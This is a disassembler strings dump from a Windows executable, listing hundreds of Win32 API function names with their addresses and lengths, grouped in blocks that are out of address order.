.text:00420B34 00000012 C IsBadHugeWritePtr

.text:00420B48 00000011 C IsBadHugeReadPtr

.text:00420B5C 0000000D C IsBadCodePtr

.text:00420B6C 00000026 C InitializeCriticalSectionAndSpinCount

.text:00420B94 0000000E C InitAtomTable

.text:00420BA4 00000009 C HeapWalk

.text:00420BB0 0000000D C HeapValidate

.text:00420BC0 0000000B C HeapUnlock

.text:00420BCC 00000009 C HeapLock

.text:00420BD8 00000009 C HeapFree

.text:00420BE4 0000000C C HeapDestroy

.text:00420BF0 0000000B C HeapCreate

.text:00420BFC 0000000C C HeapCompact

.text:00420C09 0000000A C eap32Next

.text:00420C14 0000000F C Heap32ListNext

.text:00420C24 00000010 C Heap32ListFirst

.text:00420C34 0000000C C Heap32First

.text:00420C40 0000000B C GlobalWire

.text:00420C4C 0000000D C GlobalUnlock

.text:00420C5C 0000000C C GlobalUnfix

.text:00420C68 0000000D C GlobalUnWire

.text:00420C79 0000000A C lobalSize

.text:00420C84 0000000E C GlobalReAlloc

.text:00420C94 00000013 C GlobalMemoryStatus

.text:00420CA8 0000000B C GlobalLock

.text:00420CB4 0000000D C GlobalHandle

.text:00420CC4 00000013 C GlobalGetAtomNameW

.text:00420CD8 00000013 C GlobalGetAtomNameA

.text:00420CED 0000000A C lobalFree

.text:00420CF8 0000000C C GlobalFlags

.text:00420D04 0000000A C GlobalFix

.text:00420D10 00000010 C GlobalFindAtomW

.text:00420D20 00000010 C GlobalFindAtomA

.text:00420D30 00000011 C GlobalDeleteAtom

.text:00420D44 0000000E C GlobalCompact

.text:00420D54 0000000C C GlobalAlloc

.text:00420D61 0000000E C lobalAddAtomW

.text:00420D70 0000000F C GlobalAddAtomA

.text:00420D80 0000000E C GetWriteWatch

.text:00420D90 00000015 C GetWindowsDirectoryW

.text:00420DA8 00000015 C GetWindowsDirectoryA

.text:00420DC0 00000016 C GetVolumeInformationW

.text:00420DD8 00000016 C GetVolumeInformationA

.text:00420DF0 0000000E C GetVersionExW

.text:00420E00 0000000E C GetVersionExA

.text:00420E10 0000000B C GetVersion

.text:00420E1C 00000015 C GetUserDefaultLangID

.text:00420E34 00000013 C GetUserDefaultLCID

.text:00420E48 00000017 C GetTimeZoneInformation

.text:00420E60 0000000F C GetTimeFormatW

.text:00420E70 0000000F C GetTimeFormatA

.text:00420E80 0000000D C GetTickCount

.text:00420E90 0000000F C GetThreadTimes

.text:00420EA0 00000017 C GetThreadSelectorEntry

.text:00420EB8 00000017 C GetThreadPriorityBoost

.text:00420ED0 00000012 C GetThreadPriority

.text:00420EE4 00000010 C GetThreadLocale

.text:0041B8EC 0000000D C GetTopWindow

.text:0041B8FC 00000010 C GetTitleBarInfo

.text:0041B90C 00000011 C GetThreadDesktop

.text:0041B920 00000015 C GetTabbedTextExtentW

.text:0041B938 00000015 C GetTabbedTextExtentA

.text:0041B950 00000011 C GetSystemMetrics

.text:0041B964 0000000E C GetSystemMenu

.text:0041B974 00000011 C GetSysColorBrush

.text:0041B988 0000000C C GetSysColor

.text:0041B994 0000000B C GetSubMenu

.text:0041B9A0 0000000F C GetShellWindow

.text:0041B9B0 0000000F C GetScrollRange

.text:0041B9C0 0000000D C GetScrollPos

.text:0041B9D0 0000000E C GetScrollInfo

.text:0041B9E0 00000011 C GetScrollBarInfo

.text:0041B9F4 0000000F C GetQueueStatus

.text:0041BA04 00000009 C GetPropW

.text:0041BA10 00000009 C GetPropA

.text:0041BA1C 00000018 C GetProcessWindowStation

.text:0041BA34 00000018 C GetProcessDefaultLayout

.text:0041BA4C 0000001B C GetPriorityClipboardFormat

.text:0041BA68 0000000A C GetParent

.text:0041BA74 00000017 C GetOpenClipboardWindow

.text:0041BA8C 00000012 C GetNextDlgTabItem

.text:0041BAA0 00000014 C GetNextDlgGroupItem

.text:0041BAB4 00000010 C GetMonitorInfoW

.text:0041BAC4 00000010 C GetMonitorInfoA

.text:0041BAD4 0000000C C GetMessageW

.text:0041BAE0 0000000F C GetMessageTime

.text:0041BAF0 0000000E C GetMessagePos

.text:0041BB00 00000014 C GetMessageExtraInfo

.text:0041BB14 0000000C C GetMessageA

.text:0041BB20 0000000F C GetMenuStringW

.text:0041BB30 0000000F C GetMenuStringA

.text:0041BB40 0000000D C GetMenuState

.text:0041BB50 00000010 C GetMenuItemRect

.text:0041BB60 00000011 C GetMenuItemInfoW

.text:0041BB74 00000011 C GetMenuItemInfoA

.text:0041BB88 0000000E C GetMenuItemID

.text:0041BB98 00000011 C GetMenuItemCount

.text:0041BBAC 0000000C C GetMenuInfo

.text:0041BBB8 00000013 C GetMenuDefaultItem

.text:0041BBCC 00000015 C GetMenuContextHelpId

.text:0041BBE4 0000001B C GetMenuCheckMarkDimensions

.text:0041BC00 0000000F C GetMenuBarInfo

.text:0041BC10 00000008 C GetMenu

.text:0041BC18 0000000F C GetListBoxInfo

.text:0041BC28 00000013 C GetLastActivePopup

.text:0041BC3C 00000010 C GetKeyboardType

.text:0041BC4C 00000011 C GetKeyboardState

.text:0041BC60 00000017 C GetKeyboardLayoutNameW

.text:0041BC78 00000017 C GetKeyboardLayoutNameA

.text:0041BC90 00000016 C GetKeyboardLayoutList

.text:0041BCA8 00000012 C GetKeyboardLayout

.text:0041BCBC 0000000C C GetKeyState

.text:0041BCC8 00000010 C GetKeyNameTextW

.text:0041BCD8 00000010 C GetKeyNameTextA

.text:0041BCE8 0000000E C GetKBCodePage

.text:0041BCF8 0000000E C GetInputState

.text:0041BD08 00000010 C GetInputDesktop

.text:0041BD18 0000000C C GetIconInfo

.text:0041BD24 00000010 C GetGuiResources

.text:0041BD34 00000011 C GetGUIThreadInfo

.text:0041BD48 00000014 C GetForegroundWindow

.text:0041BD5C 00000009 C GetFocus

.text:0041BD68 00000013 C GetDoubleClickTime

.text:0041BD7C 00000010 C GetDlgItemTextW

.text:0041BD8C 00000010 C GetDlgItemTextA

.text:0041BD9C 0000000E C GetDlgItemInt

.text:0041BDAC 0000000B C GetDlgItem

.text:00420EF4 00000011 C GetThreadContext

.text:00420F08 0000000D C GetTempPathW

.text:00420F18 0000000D C GetTempPathA

.text:00420F28 00000011 C GetTempFileNameW

.text:00420F3C 00000011 C GetTempFileNameA

.text:00420F50 0000000E C GetTapeStatus

.text:00420F60 00000010 C GetTapePosition

.text:00420F70 00000012 C GetTapeParameters

.text:00420F84 00000018 C GetSystemTimeAsFileTime

.text:00420F9C 00000018 C GetSystemTimeAdjustment

.text:00420FB4 0000000E C GetSystemTime

.text:00420FC4 00000015 C GetSystemPowerStatus

.text:00420FDC 0000000E C GetSystemInfo

.text:00420FEC 00000014 C GetSystemDirectoryW

.text:00421000 00000014 C GetSystemDirectoryA

.text:00421014 00000017 C GetSystemDefaultLangID

.text:0042102C 00000015 C GetSystemDefaultLCID

.text:00421044 0000000F C GetStringTypeW

.text:00421054 00000011 C GetStringTypeExW

.text:00421068 00000011 C GetStringTypeExA

.text:0042107C 0000000F C GetStringTypeA

.text:0042108C 0000000D C GetStdHandle

.text:0042109C 00000010 C GetStartupInfoW

.text:004210AC 00000010 C GetStartupInfoA

.text:004210BC 00000012 C GetShortPathNameW

.text:004210D0 00000012 C GetShortPathNameA

.text:004210E4 0000001A C GetQueuedCompletionStatus

.text:00421100 00000012 C GetProfileStringW

.text:00421114 00000012 C GetProfileStringA

.text:00421128 00000013 C GetProfileSectionW

.text:0042113C 00000013 C GetProfileSectionA

.text:00421150 0000000F C GetProfileIntW

.text:00421160 0000000F C GetProfileIntA

.text:00421170 00000019 C GetProcessWorkingSetSize

.text:0042118C 00000012 C GetProcessVersion

.text:004211A0 00000010 C GetProcessTimes

.text:004211B0 0000001D C GetProcessShutdownParameters

.text:004211D0 00000018 C GetProcessPriorityBoost

.text:004211E8 00000010 C GetProcessHeaps

.text:004211F8 0000000F C GetProcessHeap

.text:00421208 00000017 C GetProcessAffinityMask

.text:00421220 0000000F C GetProcAddress

.text:00421230 00000019 C GetPrivateProfileStructW

.text:0042124C 00000019 C GetPrivateProfileStructA

.text:00421268 00000019 C GetPrivateProfileStringW

.text:00421284 00000019 C GetPrivateProfileStringA

.text:004212A0 0000001A C GetPrivateProfileSectionW

.text:004212BC 0000001F C GetPrivateProfileSectionNamesW

.text:004212DC 0000001F C GetPrivateProfileSectionNamesA

.text:004212FC 0000001A C GetPrivateProfileSectionA

.text:00421318 00000016 C GetPrivateProfileIntW

.text:00421330 00000016 C GetPrivateProfileIntA

.text:00421348 00000011 C GetPriorityClass

.text:0042135C 00000014 C GetOverlappedResult

.text:00421370 00000009 C GetOEMCP

.text:0042137C 0000001F C GetNumberOfConsoleMouseButtons

.text:0042139C 0000001E C GetNumberOfConsoleInputEvents

.text:004213BC 00000011 C GetNumberFormatW

.text:004213D0 00000011 C GetNumberFormatA

.text:004213E4 00000011 C GetNamedPipeInfo

.text:004213F8 00000019 C GetNamedPipeHandleStateW

.text:00421414 00000019 C GetNamedPipeHandleStateA

.text:00421430 00000011 C GetModuleHandleW

.text:00421444 00000011 C GetModuleHandleA

.text:00421458 00000013 C GetModuleFileNameW

.text:0042146C 00000013 C GetModuleFileNameA

.text:00421480 00000010 C GetMailslotInfo

.text:00421490 00000011 C GetLongPathNameW

.text:004214A4 00000011 C GetLongPathNameA

.text:004214B8 00000011 C GetLogicalDrives


.text:0041BDB8 0000000D C GetDlgCtrlID

.text:0041BDC8 00000013 C GetDialogBaseUnits

.text:0041BDDC 00000011 C GetDesktopWindow

.text:0041BDF0 00000008 C GetDCEx

.text:0041BDF8 00000006 C GetDC

.text:0041BE00 0000000D C GetCursorPos

.text:0041BE10 0000000E C GetCursorInfo

.text:0041BE20 0000000A C GetCursor

.text:0041BE2C 00000010 C GetComboBoxInfo

.text:0041BE3C 00000013 C GetClipboardViewer

.text:0041BE50 0000001B C GetClipboardSequenceNumber

.text:0041BE6C 00000012 C GetClipboardOwner

.text:0041BE80 00000018 C GetClipboardFormatNameW

.text:0041BE98 00000018 C GetClipboardFormatNameA

.text:0041BEB0 00000011 C GetClipboardData

.text:0041BEC4 0000000E C GetClipCursor

.text:0041BED4 0000000E C GetClientRect

.text:0041BEE4 0000000D C GetClassWord

.text:0041BEF4 0000000E C GetClassNameW

.text:0041BF04 0000000E C GetClassNameA

.text:0041BF14 0000000E C GetClassLongW

.text:0041BF24 0000000E C GetClassLongA

.text:0041BF34 0000000E C GetClassInfoW

.text:0041BF44 00000010 C GetClassInfoExW

.text:0041BF54 00000010 C GetClassInfoExA

.text:0041BF64 0000000E C GetClassInfoA

.text:0041BF74 0000000C C GetCaretPos

.text:0041BF80 00000012 C GetCaretBlinkTime

.text:0041BF94 0000000B C GetCapture

.text:0041BFA0 00000011 C GetAsyncKeyState

.text:0041BFB4 0000000C C GetAncestor

.text:0041BFC0 0000000E C GetAltTabInfo

.text:0041BFD0 00000010 C GetActiveWindow

.text:0041BFE0 0000000E C FreeDDElParam

.text:0041BFF0 0000000A C FrameRect

.text:0041BFFC 0000000E C FlashWindowEx

.text:0041C00C 0000000C C FlashWindow

.text:0041C018 0000000C C FindWindowW

.text:0041C024 0000000E C FindWindowExW

.text:0041C034 0000000E C FindWindowExA

.text:0041C044 0000000C C FindWindowA

.text:0041C050 00000009 C FillRect

.text:0041C05C 0000000E C ExitWindowsEx

.text:0041C06C 00000011 C ExcludeUpdateRgn

.text:0041C080 0000000A C EqualRect

.text:0041C08C 0000000C C EnumWindows

.text:0041C098 00000014 C EnumWindowStationsW

.text:0041C0AC 00000014 C EnumWindowStationsA

.text:0041C0C0 00000012 C EnumThreadWindows

.text:0041C0D4 0000000B C EnumPropsW

.text:0041C0E0 0000000D C EnumPropsExW

.text:0041C0F0 0000000D C EnumPropsExA

.text:0041C100 0000000B C EnumPropsA

.text:0041C10C 00000015 C EnumDisplaySettingsW

.text:0041C124 00000017 C EnumDisplaySettingsExW

.text:0041C13C 00000017 C EnumDisplaySettingsExA

.text:0041C154 00000015 C EnumDisplaySettingsA

.text:0041C16C 00000014 C EnumDisplayMonitors

.text:0041C180 00000014 C EnumDisplayDevicesW

.text:0041C194 00000014 C EnumDisplayDevicesA

.text:0041C1A8 0000000E C EnumDesktopsW

.text:0041C1B8 0000000E C EnumDesktopsA

.text:0041C1C8 00000013 C EnumDesktopWindows

.text:0041C1DC 00000015 C EnumClipboardFormats

.text:0041C1F4 00000011 C EnumChildWindows

.text:0041C208 00000008 C EndTask

.text:0041C210 00000009 C EndPaint

.text:0041C21C 00000008 C EndMenu

.text:0041C224 0000000A C EndDialog

.text:0041C230 00000012 C EndDeferWindowPos

.text:004214CC 00000018 C GetLogicalDriveStringsW

.text:004214E4 00000018 C GetLogicalDriveStringsA

.text:004214FC 0000000F C GetLocaleInfoW

.text:0042150C 0000000F C GetLocaleInfoA

.text:0042151C 0000000D C GetLocalTime

.text:0042152C 0000000D C GetLastError

.text:0042153C 0000001C C GetLargestConsoleWindowSize

.text:00421558 00000015 C GetHandleInformation

.text:00421570 00000011 C GetFullPathNameW

.text:00421584 00000011 C GetFullPathNameA

.text:00421598 0000000C C GetFileType

.text:004215A4 0000000C C GetFileTime

.text:004215B0 0000000C C GetFileSize

.text:004215BC 0000001B C GetFileInformationByHandle

.text:004215D8 00000013 C GetFileAttributesW

.text:004215EC 00000015 C GetFileAttributesExW

.text:00421604 00000015 C GetFileAttributesExA

.text:0042161C 00000013 C GetFileAttributesA

.text:00421630 00000012 C GetExitCodeThread

.text:00421644 00000013 C GetExitCodeProcess

.text:00421658 00000018 C GetEnvironmentVariableW

.text:00421670 00000018 C GetEnvironmentVariableA

.text:00421688 00000017 C GetEnvironmentStringsW

.text:004216A0 00000017 C GetEnvironmentStringsA

.text:004216B8 00000016 C GetEnvironmentStrings

.text:004216D0 0000000E C GetDriveTypeW

.text:004216E0 0000000E C GetDriveTypeA

.text:004216F0 00000012 C GetDiskFreeSpaceW

.text:00421704 00000014 C GetDiskFreeSpaceExW

.text:00421718 00000014 C GetDiskFreeSpaceExA

.text:0042172C 00000012 C GetDiskFreeSpaceA

.text:00421740 00000014 C GetDevicePowerState

.text:00421754 00000016 C GetDefaultCommConfigW

.text:0042176C 00000016 C GetDefaultCommConfigA

.text:00421784 0000000F C GetDateFormatW

.text:00421794 0000000F C GetDateFormatA

.text:004217A4 00000013 C GetCurrentThreadId

.text:004217B8 00000011 C GetCurrentThread

.text:004217CC 00000014 C GetCurrentProcessId

.text:004217E0 00000012 C GetCurrentProcess

.text:004217F4 00000015 C GetCurrentDirectoryW

.text:0042180C 00000015 C GetCurrentDirectoryA

.text:00421824 00000013 C GetCurrencyFormatW

.text:00421838 00000013 C GetCurrencyFormatA

.text:0042184C 00000011 C GetConsoleTitleW

.text:00421860 00000011 C GetConsoleTitleA

.text:00421874 0000001B C GetConsoleScreenBufferInfo

.text:00421890 00000013 C GetConsoleOutputCP

.text:004218A4 0000000F C GetConsoleMode

.text:004218B4 00000015 C GetConsoleCursorInfo

.text:004218CC 0000000D C GetConsoleCP

.text:004218DC 00000011 C GetComputerNameW

.text:004218F0 00000011 C GetComputerNameA

.text:00421904 00000017 C GetCompressedFileSizeW

.text:0042191C 00000017 C GetCompressedFileSizeA

.text:00421934 00000010 C GetCommandLineW

.text:00421944 00000010 C GetCommandLineA

.text:00421954 00000010 C GetCommTimeouts

.text:00421964 0000000D C GetCommState

.text:00421974 00000012 C GetCommProperties

.text:00421988 00000013 C GetCommModemStatus

.text:0042199C 0000000C C GetCommMask

.text:004219A8 0000000E C GetCommConfig

.text:004219B8 00000011 C GetCalendarInfoW

.text:004219CC 00000011 C GetCalendarInfoA

.text:004219E0 0000000D C GetCPInfoExW

.text:004219F0 0000000D C GetCPInfoExA

.text:00421A00 0000000A C GetCPInfo

.text:00421A0C 0000000F C GetBinaryTypeW

.text:00421A1C 0000000F C GetBinaryTypeA


.text:0041C244 0000000D C EnableWindow

.text:0041C254 00000010 C EnableScrollBar

.text:0041C264 0000000F C EnableMenuItem

.text:0041C274 0000000F C EmptyClipboard

.text:0041C284 0000000C C EditWndProc

.text:0041C290 0000000A C DrawTextW

.text:0041C29C 0000000C C DrawTextExW

.text:0041C2A8 0000000C C DrawTextExA

.text:0041C2B4 0000000A C DrawTextA

.text:0041C2C0 0000000B C DrawStateW

.text:0041C2CC 0000000B C DrawStateA

.text:0041C2D8 0000000C C DrawMenuBar

.text:0041C2E4 0000000B C DrawIconEx

.text:0041C2F0 00000009 C DrawIcon

.text:0041C2FC 00000011 C DrawFrameControl

.text:0041C310 0000000A C DrawFrame

.text:0041C31C 0000000E C DrawFocusRect

.text:0041C32C 00000009 C DrawEdge

.text:0041C338 0000000C C DrawCaption

.text:0041C344 00000012 C DrawAnimatedRects

.text:0041C358 0000000B C DragObject

.text:0041C364 0000000B C DragDetect

.text:0041C370 00000010 C DlgDirSelectExW

.text:0041C380 00000010 C DlgDirSelectExA

.text:0041C390 00000018 C DlgDirSelectComboBoxExW

.text:0041C3A8 00000018 C DlgDirSelectComboBoxExA

.text:0041C3C0 0000000C C DlgDirListW

.text:0041C3CC 00000014 C DlgDirListComboBoxW

.text:0041C3E0 00000014 C DlgDirListComboBoxA

.text:0041C3F4 0000000C C DlgDirListA

.text:0041C400 00000011 C DispatchMessageW

.text:0041C414 00000011 C DispatchMessageA

.text:0041C428 00000010 C DialogBoxParamW

.text:0041C438 00000010 C DialogBoxParamA

.text:0041C448 00000018 C DialogBoxIndirectParamW

.text:0041C460 00000018 C DialogBoxIndirectParamA

.text:0041C478 0000000E C DestroyWindow

.text:0041C488 0000000C C DestroyMenu

.text:0041C494 0000000C C DestroyIcon

.text:0041C4A0 0000000E C DestroyCursor

.text:0041C4B0 0000000D C DestroyCaret

.text:0041C4C0 00000018 C DestroyAcceleratorTable

.text:0041C4D8 0000000B C DeleteMenu

.text:0041C4E4 0000000F C DeferWindowPos

.text:0041C4F4 0000000F C DefWindowProcW

.text:0041C504 0000000F C DefWindowProcA

.text:0041C514 00000011 C DefMDIChildProcW

.text:0041C528 00000011 C DefMDIChildProcA

.text:0041C53C 0000000E C DefFrameProcW

.text:0041C54C 0000000E C DefFrameProcA

.text:0041C55C 0000000C C DefDlgProcW

.text:0041C568 0000000C C DefDlgProcA

.text:0041C574 00000010 C DdeUninitialize

.text:0041C584 00000010 C DdeUnaccessData

.text:0041C594 00000011 C DdeSetUserHandle

.text:0041C5A8 00000017 C DdeSetQualityOfService

.text:0041C5C0 0000000D C DdeReconnect

.text:0041C5D0 00000010 C DdeQueryStringW

.text:0041C5E0 00000010 C DdeQueryStringA

.text:0041C5F0 00000013 C DdeQueryNextServer

.text:0041C604 00000011 C DdeQueryConvInfo

.text:0041C618 0000000E C DdePostAdvise

.text:0041C628 0000000F C DdeNameService

.text:0041C638 00000014 C DdeKeepStringHandle

.text:0041C64C 0000000F C DdeInitializeW

.text:0041C65C 0000000F C DdeInitializeA

.text:0041C66C 00000015 C DdeImpersonateClient

.text:0041C684 00000010 C DdeGetLastError

.text:0041C694 0000000B C DdeGetData

.text:0041C6A0 00000014 C DdeFreeStringHandle

.text:00421A2C 0000000E C GetBinaryType

.text:00421A3C 0000000D C GetAtomNameW

.text:00421A4C 0000000D C GetAtomNameA

.text:00421A5C 00000007 C GetACP

.text:00421A64 00000019 C GenerateConsoleCtrlEvent

.text:00421A80 0000000D C FreeResource

.text:00421A90 00000019 C FreeLibraryAndExitThread

.text:00421AAC 0000000C C FreeLibrary

.text:00421AB8 00000018 C FreeEnvironmentStringsW

.text:00421AD0 00000018 C FreeEnvironmentStringsA

.text:00421AE8 0000000C C FreeConsole

.text:00421AF4 0000000F C FormatMessageW

.text:00421B04 0000000F C FormatMessageA

.text:00421B14 0000000C C FoldStringW

.text:00421B20 0000000C C FoldStringA

.text:00421B2C 00000010 C FlushViewOfFile

.text:00421B3C 00000016 C FlushInstructionCache

.text:00421B54 00000011 C FlushFileBuffers

.text:00421B68 00000018 C FlushConsoleInputBuffer

.text:00421B80 0000000E C FindResourceW

.text:00421B90 00000010 C FindResourceExW

.text:00421BA0 00000010 C FindResourceExA

.text:00421BB0 0000000E C FindResourceA

.text:00421BC0 0000000E C FindNextFileW

.text:00421BD0 0000000E C FindNextFileA

.text:00421BE0 0000001B C FindNextChangeNotification

.text:00421BFC 0000000F C FindFirstFileW

.text:00421C0C 00000011 C FindFirstFileExW

.text:00421C20 00000011 C FindFirstFileExA

.text:00421C34 0000000F C FindFirstFileA

.text:00421C44 0000001D C FindFirstChangeNotificationW

.text:00421C64 0000001D C FindFirstChangeNotificationA

.text:00421C84 0000001C C FindCloseChangeNotification

.text:00421CA0 0000000A C FindClose

.text:00421CAC 0000000A C FindAtomW

.text:00421CB8 0000000A C FindAtomA

.text:00421CC4 0000001C C FillConsoleOutputCharacterW

.text:00421CE0 0000001C C FillConsoleOutputCharacterA

.text:00421CFC 0000001B C FillConsoleOutputAttribute

.text:00421D18 00000015 C FileTimeToSystemTime

.text:00421D30 00000018 C FileTimeToLocalFileTime

.text:00421D48 00000016 C FileTimeToDosDateTime

.text:00421D60 0000000A C FatalExit

.text:00421D6C 0000000E C FatalAppExitW

.text:00421D7C 0000000E C FatalAppExitA

.text:00421D8C 0000001A C ExpandEnvironmentStringsW

.text:00421DA8 0000001A C ExpandEnvironmentStringsA

.text:00421DC4 0000000C C ExitProcess

.text:00421DD0 00000013 C EscapeCommFunction

.text:00421DE4 0000000A C EraseTape

.text:00421DF0 00000011 C EnumTimeFormatsW

.text:00421E04 00000011 C EnumTimeFormatsA

.text:00421E18 00000013 C EnumSystemLocalesW

.text:00421E2C 00000013 C EnumSystemLocalesA

.text:00421E40 00000015 C EnumSystemCodePagesW

.text:00421E58 00000015 C EnumSystemCodePagesA

.text:00421E70 00000013 C EnumResourceTypesW

.text:00421E84 00000013 C EnumResourceTypesA

.text:00421E98 00000013 C EnumResourceNamesW

.text:00421EAC 00000013 C EnumResourceNamesA

.text:00421EC0 00000017 C EnumResourceLanguagesW

.text:00421ED8 00000017 C EnumResourceLanguagesA

.text:00421EF0 00000011 C EnumDateFormatsW

.text:00421F04 00000013 C EnumDateFormatsExW

.text:00421F18 00000013 C EnumDateFormatsExA

.text:00421F2C 00000011 C EnumDateFormatsA

.text:00421F40 00000012 C EnumCalendarInfoW

.text:00421F54 00000014 C EnumCalendarInfoExW

.text:00421F68 00000014 C EnumCalendarInfoExA

.text:00421F7C 00000012 C EnumCalendarInfoA


.text:0041C6B4 00000012 C DdeFreeDataHandle

.text:0041C6C8 00000012 C DdeEnableCallback

.text:0041C6DC 00000012 C DdeDisconnectList

.text:0041C6F0 0000000E C DdeDisconnect

.text:0041C700 00000017 C DdeCreateStringHandleW

.text:0041C718 00000017 C DdeCreateStringHandleA

.text:0041C730 00000014 C DdeCreateDataHandle

.text:0041C744 0000000F C DdeConnectList

.text:0041C754 0000000B C DdeConnect

.text:0041C760 00000014 C DdeCmpStringHandles

.text:0041C774 00000015 C DdeClientTransaction

.text:0041C78C 0000000B C DdeAddData

.text:0041C798 0000000E C DdeAccessData

.text:0041C7A8 00000016 C DdeAbandonTransaction

.text:0041C7C0 00000015 C CreateWindowStationW

.text:0041C7D8 00000015 C CreateWindowStationA

.text:0041C7F0 00000010 C CreateWindowExW

.text:0041C800 00000010 C CreateWindowExA

.text:0041C810 00000010 C CreatePopupMenu

.text:0041C820 0000000B C CreateMenu

.text:0041C82C 00000011 C CreateMDIWindowW

.text:0041C840 00000011 C CreateMDIWindowA

.text:0041C854 00000013 C CreateIconIndirect

.text:0041C868 00000019 C CreateIconFromResourceEx

.text:0041C884 00000017 C CreateIconFromResource

.text:0041C89C 0000000B C CreateIcon

.text:0041C8A8 00000013 C CreateDialogParamW

.text:0041C8BC 00000013 C CreateDialogParamA

.text:0041C8D0 0000001B C CreateDialogIndirectParamW

.text:0041C8EC 0000001B C CreateDialogIndirectParamA

.text:0041C908 0000000F C CreateDesktopW

.text:0041C918 0000000F C CreateDesktopA

.text:0041C928 0000000D C CreateCursor

.text:0041C938 0000000C C CreateCaret

.text:0041C944 00000018 C CreateAcceleratorTableW

.text:0041C95C 00000018 C CreateAcceleratorTableA

.text:0041C974 00000016 C CountClipboardFormats

.text:0041C98C 00000009 C CopyRect

.text:0041C998 0000000A C CopyImage

.text:0041C9A4 00000009 C CopyIcon

.text:0041C9B0 00000016 C CopyAcceleratorTableW

.text:0041C9C8 00000016 C CopyAcceleratorTableA

.text:0041C9E0 00000013 C CloseWindowStation

.text:0041C9F4 0000000C C CloseWindow

.text:0041CA00 0000000D C CloseDesktop

.text:0041CA10 0000000F C CloseClipboard

.text:0041CA20 0000000B C ClipCursor

.text:0041CA2C 0000000F C ClientToScreen

.text:0041CA3C 00000017 C ChildWindowFromPointEx

.text:0041CA54 00000015 C ChildWindowFromPoint

.text:0041CA6C 00000011 C CheckRadioButton

.text:0041CA80 00000013 C CheckMenuRadioItem

.text:0041CA94 0000000E C CheckMenuItem

.text:0041CAA4 0000000F C CheckDlgButton

.text:0041CAB4 0000000B C CharUpperW

.text:0041CAC0 0000000F C CharUpperBuffW

.text:0041CAD0 0000000F C CharUpperBuffA

.text:0041CAE0 0000000B C CharUpperA

.text:0041CAEC 0000000B C CharToOemW

.text:0041CAF8 0000000F C CharToOemBuffW

.text:0041CB08 0000000F C CharToOemBuffA

.text:0041CB18 0000000B C CharToOemA

.text:0041CB24 0000000A C CharPrevW

.text:0041CB30 0000000C C CharPrevExA

.text:0041CB3C 0000000A C CharPrevA

.text:0041CB48 0000000A C CharNextW

.text:0041CB54 0000000C C CharNextExA

.text:0041CB60 0000000A C CharNextA

.text:0041CB6C 0000000B C CharLowerW

.text:0041CB78 0000000F C CharLowerBuffW

.text:00421F90 00000013 C EndUpdateResourceW

.text:00421FA4 00000013 C EndUpdateResourceA

.text:00421FB8 00000010 C DuplicateHandle

.text:00421FC8 00000016 C DosDateTimeToFileTime

.text:00421FE0 00000014 C DisconnectNamedPipe

.text:00421FF4 0000001A C DisableThreadLibraryCalls

.text:00422010 00000010 C DeviceIoControl

.text:00422020 0000000C C DeleteFileW

.text:0042202C 0000000C C DeleteFileA

.text:00422038 0000000C C DeleteFiber

.text:00422044 0000000B C DeleteAtom

.text:00422050 00000011 C DefineDosDeviceW

.text:00422064 00000011 C DefineDosDeviceA

.text:00422078 0000000B C DebugBreak

.text:00422084 00000013 C DebugActiveProcess

.text:00422098 00000015 C CreateWaitableTimerW

.text:004220B0 00000015 C CreateWaitableTimerA

.text:004220C8 00000019 C CreateToolhelp32Snapshot

.text:004220E4 0000000D C CreateThread

.text:004220F4 00000014 C CreateTapePartition

.text:00422108 00000011 C CreateSemaphoreW

.text:0042211C 00000011 C CreateSemaphoreA

.text:00422130 00000013 C CreateRemoteThread

.text:00422144 0000000F C CreateProcessW

.text:00422154 0000000F C CreateProcessA

.text:00422164 0000000B C CreatePipe

.text:00422170 00000011 C CreateNamedPipeW

.text:00422184 00000011 C CreateNamedPipeA

.text:00422198 0000000D C CreateMutexW

.text:004221A8 0000000D C CreateMutexA

.text:004221B8 00000010 C CreateMailslotW

.text:004221C8 00000010 C CreateMailslotA

.text:004221D8 00000017 C CreateIoCompletionPort

.text:004221F0 0000000C C CreateFileW

.text:004221FC 00000013 C CreateFileMappingW

.text:00422210 00000013 C CreateFileMappingA

.text:00422224 0000000C C CreateFileA

.text:00422230 0000000C C CreateFiber

.text:0042223C 0000000D C CreateEventW

.text:0042224C 0000000D C CreateEventA

.text:0042225C 00000011 C CreateDirectoryW

.text:00422270 00000013 C CreateDirectoryExW

.text:00422284 00000013 C CreateDirectoryExA

.text:00422298 00000011 C CreateDirectoryA

.text:004222AC 0000001A C CreateConsoleScreenBuffer

.text:004222C8 0000000A C CopyFileW

.text:004222D4 0000000C C CopyFileExW

.text:004222E0 0000000C C CopyFileExA

.text:004222EC 0000000A C CopyFileA

.text:004222F8 00000015 C ConvertThreadToFiber

.text:00422310 00000015 C ConvertDefaultLocale

.text:00422328 00000013 C ContinueDebugEvent

.text:0042233C 00000011 C ConnectNamedPipe

.text:00422350 0000000F C CompareStringW

.text:00422360 0000000F C CompareStringA

.text:00422370 00000010 C CompareFileTime

.text:00422380 00000012 C CommConfigDialogW

.text:00422394 00000012 C CommConfigDialogA

.text:004223A8 0000000C C CloseHandle

.text:004223B4 0000000F C ClearCommError

.text:004223C4 0000000F C ClearCommBreak

.text:004223D4 00000014 C CancelWaitableTimer

.text:004223E8 00000009 C CancelIo

.text:004223F4 0000001A C CancelDeviceWakeupRequest

.text:00422410 0000000F C CallNamedPipeW

.text:00422420 0000000F C CallNamedPipeA

.text:00422430 0000000E C BuildCommDCBW

.text:00422440 00000019 C BuildCommDCBAndTimeoutsW

.text:0042245C 00000019 C BuildCommDCBAndTimeoutsA

.text:00422478 0000000E C BuildCommDCBA


.text:0041CB88 0000000F C CharLowerBuffA

.text:0041CB98 0000000B C CharLowerA

.text:0041CBA4 0000000C C ChangeMenuW

.text:0041CBB0 0000000C C ChangeMenuA

.text:0041CBBC 00000017 C ChangeDisplaySettingsW

.text:0041CBD4 00000019 C ChangeDisplaySettingsExW

.text:0041CBF0 00000019 C ChangeDisplaySettingsExA

.text:0041CC0C 00000017 C ChangeDisplaySettingsA

.text:0041CC24 00000015 C ChangeClipboardChain

.text:0041CC3C 0000000F C CascadeWindows

.text:0041CC4C 00000014 C CascadeChildWindows

.text:0041CC60 00000010 C CallWindowProcW

.text:0041CC70 00000010 C CallWindowProcA

.text:0041CC80 0000000F C CallNextHookEx

.text:0041CC90 0000000F C CallMsgFilterW

.text:0041CCA0 0000000F C CallMsgFilterA

.text:0041CCB0 0000000E C CallMsgFilter

.text:0041CCC0 00000018 C BroadcastSystemMessageW

.text:0041CCD8 00000018 C BroadcastSystemMessageA

.text:0041CCF0 00000017 C BroadcastSystemMessage

